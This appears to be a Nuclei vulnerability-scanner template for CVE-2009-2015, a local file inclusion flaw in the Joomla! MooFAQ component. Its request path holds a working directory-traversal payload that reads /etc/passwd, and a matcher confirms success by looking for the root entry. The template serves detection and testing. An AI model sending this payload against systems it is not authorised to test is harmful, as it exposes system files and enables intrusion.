28 lines
807 B
YAML
28 lines
807 B
YAML
id: CVE-2009-2015
|
|
|
|
info:
|
|
name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/8898
|
|
- https://www.cvedetails.com/cve/CVE-2009-2015
|
|
tags: cve,cve2009,joomla,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|